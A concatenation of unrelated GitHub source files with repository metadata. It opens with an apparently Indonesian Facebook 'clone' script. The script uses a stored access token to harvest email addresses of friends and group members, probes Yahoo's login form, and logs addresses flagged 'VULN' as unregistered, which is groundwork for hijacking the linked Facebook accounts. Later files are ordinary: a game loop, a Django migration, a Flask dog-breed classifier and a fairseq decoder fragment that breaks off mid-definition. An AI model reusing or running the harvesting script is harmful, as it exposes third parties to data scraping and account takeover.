except KeyError: print '\033[1;96m[?] \033[1;93mTempat tinggal\033[1;97m: \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTanggal lahir\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mSekolah\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mTidak ada'
except KeyError: pass
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
else:
pass
else:
print"\033[1;96m[✖] \x1b[1;91mAkun tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Clone dari teman"
print "\x1b[1;97m3.\x1b[1;93m Clone dari member group"
print "\x1b[1;97m4.\x1b[1;93m Clone dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama+ '\n')
save = open('out/MailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/TemanMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/GrupMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
save = open('out/MailVuln.txt','a')
save.write("Email: "+ mail + '\n\n')
save.close()
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__ == '__main__':
siapa()
|
[
"noreply@github.com"
] |
Warriors12-pl.noreply@github.com
|
|
54aa67ec3c5273543302689ee3673ae0c5f94508
|
5bee51325c2e95e39e15cf95e95f525c4a7a79c7
|
/run.py
|
fe0c65ec5b2897b2b469ac9ea34ffe4e2ee4b69b
|
[] |
no_license
|
kostistsaprailis/terminal-quests
|
c5f7665372359f5ac07943a859c5ecabceaf7e49
|
9ced458d45fe1edb4a89bedc0e3fabdf9359231f
|
refs/heads/master
| 2021-03-30T21:05:38.896709
| 2018-03-14T21:36:34
| 2018-03-14T21:36:34
| 124,951,839
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 320
|
py
|
import os
import time
from world import World
from hero import Hero
def update_game_state(world):
""" """
world.update_world()
time.sleep(0.1)
if __name__ == '__main__':
os.system('clear')
world = World()
hero = Hero()
world.add_hero(hero)
while True:
update_game_state(world)
|
[
"kt@vaix.ai"
] |
kt@vaix.ai
|
529764ce7d089cb8e87188ae76b3d2386d94799f
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Projects/sphinx/sphinx-doc-translations/sphinx/sphinx/ext/ifconfig.py
|
993ef3ebae432ab8ed889876e2c6ddcb3294594b
|
[
"LicenseRef-scancode-other-permissive",
"BSD-3-Clause"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:6b14675b69f1e4709abc755afdb42367393cbdcc90a45fa7de0be6f62f368d7c
size 2583
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
e2c528db316231be8009da548b2c2a55e74c7ffd
|
df49823eb23474c89a3bbb2af3979d71c8d20571
|
/opc_ua/migrations/0005_auto_20191203_1608.py
|
1d8c38d995808b6ed873f35d0daa7ce2ef1ffae2
|
[] |
no_license
|
AleksZ13ru/scada_server_app
|
40503fdcf1fbf1b78e39b28e318392e4c2200e70
|
f9f53dbeb5c3f80b4583bddfd4ba37d8b02fd632
|
refs/heads/master
| 2022-07-30T07:02:50.475500
| 2020-01-13T08:23:55
| 2020-01-13T08:23:55
| 224,506,622
| 0
| 0
| null | 2022-07-06T20:24:02
| 2019-11-27T19:52:59
|
Python
|
UTF-8
|
Python
| false
| false
| 409
|
py
|
# Generated by Django 2.2.7 on 2019-12-03 13:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('opc_ua', '0004_remove_messagebit_enable'),
]
operations = [
migrations.AlterField(
model_name='messageevent',
name='ask_dt',
field=models.DateTimeField(blank=True, null=True),
),
]
|
[
"a.zaykin@list.ru"
] |
a.zaykin@list.ru
|
3cb1b0d90ab46d1933f4410dc81bd61892117810
|
872e1549a2ea162c51049565b74f001676e866b3
|
/app.py
|
2f0dc76949c240785ad7fd977662a5de29f0b3eb
|
[] |
no_license
|
hanseljulio/DogVision
|
64a69df612a0d82e255e87c884cd1b7118b0db6a
|
636d89f08c08e697d922ea6a0623caa8b04f380e
|
refs/heads/master
| 2023-08-08T02:47:58.784407
| 2021-09-17T08:24:25
| 2021-09-17T08:24:25
| 406,600,244
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,700
|
py
|
from enum import unique
from flask import Flask, render_template, redirect, url_for, request, session, flash
import tensorflow as tf
import tensorflow_hub as hub
import os
from werkzeug.utils import secure_filename
import numpy as np
app = Flask(__name__)
# app.config["IMAGE_UPLOADS"] = "static/uploads"
app.config["ALLOWED_IMAGE_EXTENSIONS"] = ["JPG", "PNG", "JFIF", "JPEG"]
# Define constant sizes
IMG_SIZE = 224
BATCH_SIZE = 32
unique_breeds = ['Affenpinscher', 'Afghan Hound', 'African hunting dog', 'Airedale',
'American_staffordshire_terrier', 'Appenzeller',
'Australian terrier', 'Basenji', 'Basset', 'Beagle',
'Bedlington terrier', 'Bernese mountain dog',
'Black and tan coonhound', 'Blenheim spaniel', 'Bloodhound',
'Bluetick', 'Border collie', 'Border terrier', 'Borzoi',
'Boston bull', 'Bouvier des flandres', 'Boxer',
'Brabancon griffon', 'Briard', 'Brittany spaniel', 'Bull mastiff',
'Cairn', 'Cardigan', 'Chesapeake bay retriever', 'Chihuahua',
'Chow', 'Clumber', 'Cocker_spaniel', 'Collie',
'Curly-coated retriever', 'Dandie dinmont', 'Dhole', 'Dingo',
'Doberman', 'English foxhound', 'English setter',
'English springer', 'Entlebucher', 'Eskimo dog',
'Flat-coated retriever', 'French bulldog', 'German shepherd',
'German short-haired pointer', 'Giant schnauzer',
'Golden retriever', 'Gordon setter', 'Great dane',
'Great pyrenees', 'Greater Swiss mountain dog', 'Groenendael',
'Ibizan hound', 'Irish setter', 'Irish terrier',
'Irish water spaniel', 'Irish wolfhound', 'Italian greyhound',
'Japanese spaniel', 'Keeshond', 'Kelpie', 'Kerry blue terrier',
'Komondor', 'Kuvasz', 'Labrador retriever', 'Lakeland terrier',
'Leonberg', 'Lhasa', 'Malamute', 'Malinois', 'Maltese dog',
'Mexican hairless', 'Miniature pinscher', 'Miniature poodle',
'Miniature schnauzer', 'Newfoundland', 'Norfolk terrier',
'Norwegian elkhound', 'Norwich terrier', 'Old english sheepdog',
'Otterhound', 'Papillon', 'Pekinese', 'Pembroke', 'Pomeranian',
'Pug', 'Redbone', 'Rhodesian ridgeback', 'Rottweiler',
'Saint_bernard', 'Saluki', 'Samoyed', 'Schipperke',
'Scotch terrier', 'Scottish deerhound', 'Sealyham terrier',
'Shetland sheepdog', 'Shih-tzu', 'Siberian husky', 'Silky terrier',
'Soft-coated wheaten terrier', 'Staffordshire bullterrier',
'Standard poodle', 'Standard schnauzer', 'Sussex spaniel',
'Tibetan mastiff', 'Tibetan terrier', 'Toy poodle', 'Toy terrier',
'Vizsla', 'Walker hound', 'Weimaraner', 'Welsh springer spaniel',
'West highland white terrier', 'whippet',
'Wire-haired fox terrier', 'Yorkshire terrier']
# Deep learning functions
# Create function to load a trained model
# Loads a saved model from a specified path.
def load_model(model_path):
print(f"Loading saved model from: {model_path}")
model = tf.keras.models.load_model(model_path, custom_objects={"KerasLayer": hub.KerasLayer})
return model
# Create a simple function to return a tuple (image, label)
# Takes an image file path name and the associated label, processes
# the image and return a tuple of (image, label)
def get_image_label(image_path, label):
image = process_image(image_path)
return image, label
# Check file extension
def allowed_image(filename):
if not "." in filename:
return False
ext = filename.rsplit(".", 1)[1]
if ext.upper() in app.config["ALLOWED_IMAGE_EXTENSIONS"]:
return True
else:
return False
# Turns an array of prediction probabilities into a label
def get_pred_label(prediction_probabilities):
return unique_breeds[np.argmax(prediction_probabilities)]
# Process image function to be compatible for deep learning
def process_image(image_path, img_size=IMG_SIZE):
# Read image file
image = tf.io.read_file(image_path)
# Turn jpg image into numerical Tensor with 3 color channels (RGB)
image = tf.image.decode_jpeg(image, channels=3)
# Convert the color channel values from 0-255 to 0-1 values
image = tf.image.convert_image_dtype(image, tf.float32)
# Resize the image to our desired value (224, 224)
image = tf.image.resize(image, size=[IMG_SIZE, IMG_SIZE])
return image
# Create a function to turn data into batches
# Creates batches of data out of image (X) and label (y) pairs.
# It shuffles the data if it's training data but doesn't shuffle if it's validation data.
# Also accepts test data as input (no labels)
def create_data_batches(X, y=None, batch_size=BATCH_SIZE, valid_data=False, test_data=False):
# If the data is a test data set, we probably don't have labels
if test_data:
print("Creating test data batches...")
# Only filepaths (no labels)
data = tf.data.Dataset.from_tensor_slices((tf.constant(X)))
data_batch = data.map(process_image).batch(BATCH_SIZE)
return data_batch
# If the data is a valid dataset, we don't need to shuffle it
elif valid_data:
print("Creating validation data batches...")
# tf.constant(X) = filepaths, tf.constant(y) = labels
data = tf.data.Dataset.from_tensor_slices((tf.constant(X), tf.constant(y)))
data_batch = data.map(get_image_label).batch(BATCH_SIZE)
return data_batch
else:
print("Creating training data batches...")
# Turn filepaths and labels into Tensors
data = tf.data.Dataset.from_tensor_slices((tf.constant(X), tf.constant(y)))
# Shuffling pathnames and labels before mapping image processor function is faster than shuffling images
data = data.shuffle(buffer_size=len(X))
# Create (image, label) tuples (this also turns the image path into a preprocessed image)
data = data.map(get_image_label)
# Turn the training data into batches
data_batch = data.batch(BATCH_SIZE)
return data_batch
# Website functions
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == "POST":
if request.files:
image = request.files['image']
if image.filename == "":
return '''
<script> window.alert("Image must have a filename!"); </script>
<script> window.location=document.referrer; </script>
'''
if not allowed_image(image.filename):
return '''
<script> window.alert("Image extension is not allowed!"); </script>
<script> window.location=document.referrer; </script>
'''
else:
filename = secure_filename(image.filename)
image.save(os.path.join(app.root_path,'static/uploads/', filename))
return redirect(url_for('result', filename=filename))
return render_template('index.html')
@app.route('/list', methods=['GET', 'POST'])
def doglist():
return render_template('doglist.html', unique_breeds=unique_breeds, length=len(unique_breeds))
@app.route('/result', methods=['GET', 'POST'])
def result():
filename = "static/uploads/" + request.args.get("filename")
model = load_model("21-21211630876899-full-image-set-mobilenetv2-Adam.h5")
filename_paths = [filename]
custom_data = create_data_batches(filename_paths, test_data=True)
# Make predictions on custom data
custom_preds = model.predict(custom_data)
# Get custom image prediction labels
custom_pred_labels = [get_pred_label(custom_preds[i]) for i in range(len(custom_preds))]
result = custom_pred_labels[0]
return render_template('result.html', filename=filename, result=result)
if __name__ == '__main__':
app.run(debug=False)
|
[
"hanseljulio@yahoo.com"
] |
hanseljulio@yahoo.com
|
e7f73b4c833372c1cde39e5afcabdf8db5fee1a2
|
efd5d630aaab511e65e35f4675a3303d7e47fdd0
|
/4.py
|
281ae183f1140c98f83ef9a42a7b08d088df5f45
|
[] |
no_license
|
BoopPush/HardTasksPY
|
75d32bf00df44d26ed84b6de62b51f3c5cb62488
|
6651aa33df260ee12adcdbd94e55129f8868e99d
|
refs/heads/master
| 2023-07-24T07:09:23.639079
| 2021-09-11T12:01:18
| 2021-09-11T12:01:18
| 395,285,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
# Итератор , который возвращает размещения
from itertools import *
m = input(": ")
n = int(input(": "))
for i in permutations(m, n):
print(i, end=' ')
|
[
"BoopPush@git.com"
] |
BoopPush@git.com
|
1ec3ebb69151f58cbb0bece288b33466f667ddb9
|
db9b61ee3e5284880f6198b330d2941134bc88de
|
/frongo/scripts/fremeniser.py
|
cdd7aae5cb7689d330f70fd480d0ed8e2cfec3ee
|
[
"MIT"
] |
permissive
|
AdrianKlei/fremen
|
3128c59822dd6825f0aebc700ffcbfb3dc8425c1
|
f1a6051d8e391a9f3ecabe75bafb27e8ec732fa8
|
refs/heads/master
| 2022-12-19T08:13:14.678054
| 2020-09-23T14:53:36
| 2020-09-23T14:53:36
| 297,958,036
| 0
| 0
|
NOASSERTION
| 2020-09-23T12:10:19
| 2020-09-23T12:10:18
| null |
UTF-8
|
Python
| false
| false
| 7,522
|
py
|
#!/usr/bin/env python
import rospy
import yaml
import json
import pymongo
import argparse
import numpy as np
import std_msgs
from std_srvs.srv import Trigger
from frongo.temporal_models import *
from frongo.graph_models import *
from frongo.srv import PredictState
from frongo.srv import PredictStateOrder
from frongo.srv import GraphModel
from frongo.srv import GetInfo
from frongo.srv import AddModel
def load_yaml(filename):
data=[]
rospy.loginfo("loading %s"%filename)
with open(filename, 'r') as f:
datum = yaml.load(f)
if not isinstance(datum, list):
data.append(datum)
else:
data=datum
return data
class frongo(object):
def __init__(self, data) :
self.is_fremen_active=False
self.models=[]
rospy.on_shutdown(self._on_node_shutdown)
host = rospy.get_param("mongodb_host")
port = rospy.get_param("mongodb_port")
self.mongo_client = pymongo.MongoClient(host, port)
if data:
self.create_models(data)
for i in self.models:
print i
# Subscribe to fremen server start topic
rospy.Subscriber('/fremenserver_start', std_msgs.msg.Bool, self.fremen_restart_cb)
rospy.loginfo("... Done")
rospy.sleep(3)
#Advertise Service
self.get_states_srv=rospy.Service('/frongo/get_states', PredictState, self.get_states_cb)
self.predict_ent_srv=rospy.Service('/frongo/get_entropies', PredictState, self.predict_entropy_cb)
self.predict_ent_ord_srv=rospy.Service('/frongo/get_entropies_with_order', PredictStateOrder, self.predict_entropy_order_cb)
self.predict_srv=rospy.Service('/frongo/predict_models', PredictState, self.predict_cb)
self.predict_ord_srv=rospy.Service('/frongo/predict_models_with_order', PredictStateOrder, self.predict_order_cb)
self.graph_build_srv=rospy.Service('/frongo/graph_model_build', GraphModel, self.graph_model_build_cb)
self.new_model_srv=rospy.Service('/frongo/add_model_defs', AddModel, self.add_model_cb)
self.info_srv=rospy.Service('/frongo/get_models', GetInfo, self.get_model_info_cb)
self.rebuild_srv=rospy.Service('/frongo/rebuild_all_models', Trigger, self.rebuild_all_models_cb)
#self.graph_model_construction()
rospy.loginfo("All Done ...")
rospy.spin()
def get_states_cb(self, req):
if len(req.epochs) < 2:
rospy.logwarn("Size of epochs requested is less than two. Returning all epochs")
for i in self.models:
if i.name == req.model_name:
epochs, predictions = i._get_states(req.epochs)
return epochs, predictions
def get_model_info_cb(self, req):
names=[]
info=[]
for i in self.models:
names.append(i.name)
info.append(i._get_info())
return names, info
def add_model_cb(self, req):
data=[]
print req.model_def
datum = yaml.load(req.model_def)
print datum
if not isinstance(datum, list):
data.append(datum)
else:
data=datum
self.create_models(data)
if self.is_fremen_active:
for i in self.models:
print i
i._create_fremen_models()
return True
def fremen_restart_cb(self, msg):
"""
This function creates the models when the fremenserver is started
"""
if msg.data:
rospy.logwarn("FREMENSERVER restart detected will generate new models now")
for i in self.models:
i._create_fremen_models()
print i.name, i.order
self.is_fremen_active=True
#self.create_models()
def rebuild_all_models_cb(self, req):
"""
This function creates the models when the service is called
"""
resp=False
if self.is_fremen_active:
for i in self.models:
i._create_fremen_models()
print i.name, i.order
resp=True
str_msg="All Done"
else:
resp=False
str_msg="No fremenserver"
return resp, str_msg
def predict_cb(self, req):
epochs =[]
for i in req.epochs:
epochs.append(i)
for i in self.models:
if i.name == req.model_name:
predictions = i._predict_outcome(epochs)
return epochs, predictions
def predict_entropy_cb(self, req):
epochs =[]
for i in req.epochs:
epochs.append(i)
for i in self.models:
if i.name == req.model_name:
predictions = i._predict_entropy(epochs)
return epochs, predictions
def predict_order_cb(self, req):
epochs =[]
for i in req.epochs:
epochs.append(i)
for i in self.models:
if i.name == req.model_name:
predictions = i._predict_outcome(epochs, order=req.order)
return epochs, predictions
def predict_entropy_order_cb(self, req):
epochs =[]
for i in req.epochs:
epochs.append(i)
for i in self.models:
if i.name == req.model_name:
predictions = i._predict_entropy(epochs, order=req.order)
return epochs, predictions
def create_models(self, data):
print data
for i in data:
#print i
val=TModels(i['model']['name'])
val._set_props_from_dict(i['model'])
self.models.append(val)
for i in self.models:
print "-------------------------------------"
print i
self.set_model_states(i)
def set_model_states(self, model):
db=self.mongo_client[model.db]
collection=db[model.collection]
query = json.loads(model.query)
available = collection.find(query)
if available:
for i in available:
model._add_entry(i)
else:
model._set_unknown(True)
def graph_model_build_cb(self, req):
self.graph_model_construction(req)
return "Done"
def graph_model_construction(self, req):
for i in self.models:
if req.model_name == i.name:
preds=[]
graph = graph_model(i.name)
ordeps = np.arange(min(i.epochs), max(i.epochs), 3600)
ordrange = np.arange(req.from_val, req.until_val+1, req.increment)
for j in ordrange.tolist():
preds.append(i._predict_outcome(ordeps.tolist(), order=j))
graph.graph_model_construction(i.epochs, i.states, preds, ordeps.tolist())
def _on_node_shutdown(self):
rospy.loginfo("Shutting Down ...")
self.mongo_client.close()
rospy.loginfo("Done... Bye")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-yaml_defs", help="The yaml file", type=str)
args, unknown = parser.parse_known_args() # Necessary due to roslaunch injecting rubbish arguments
if args.yaml_defs:
data = load_yaml(args.yaml_defs)
else:
print "starting empty"
data=''
rospy.init_node('door_prediction')
server = frongo(data)
|
[
"marc@hanheide.net"
] |
marc@hanheide.net
|
8caf0ac2f29b470bd287edb3a60880ed31f2327f
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/built-in/nlp/Fairseq_Transformer_wmt18_for_PyTorch/fairseq/models/transformer/transformer_decoder_aug.py
|
c5e710179443705f47c9aaba02927d8d43d80fff
|
[
"MIT",
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 14,744
|
py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Any, Dict, List, Optional
import torch
import torch.nn as nn
from torch import Tensor
from fairseq import utils
from fairseq.distributed import fsdp_wrap
from fairseq.models.transformer import TransformerConfig
from fairseq.models.transformer.transformer_decoder import TransformerDecoderBase
from fairseq.modules import (
LayerDropModuleList,
SinusoidalPositionalEmbedding,
transformer_layer_aug,
)
from fairseq.modules.checkpoint_activations import checkpoint_wrapper
class AugTransformerDecoderBase(TransformerDecoderBase):
"""
Transformer decoder augmented with an additional cross-attention. Each layer
is a :class:`AugTransformerDecoderLayerBase`.
Args:
cfg (argparse.Namespace): parsed command-line arguments
dictionary (~fairseq.data.Dictionary): decoding dictionary
embed_tokens (torch.nn.Embedding): output embedding
encoder_attn_merge_type (str, optional): the way to combine outputs from
two cross-attention modules. If "sequential" is set, two cross-attention
modules are stacked sequentially. If "parallel" is set, they are processed
in parallel and combined before feeding it to FFN (default: sequential).
dropnet_ratio (float, optional): a probability to drop each cross-attention
module during training (default: 0.0).
"""
def __init__(
self,
cfg,
dictionary,
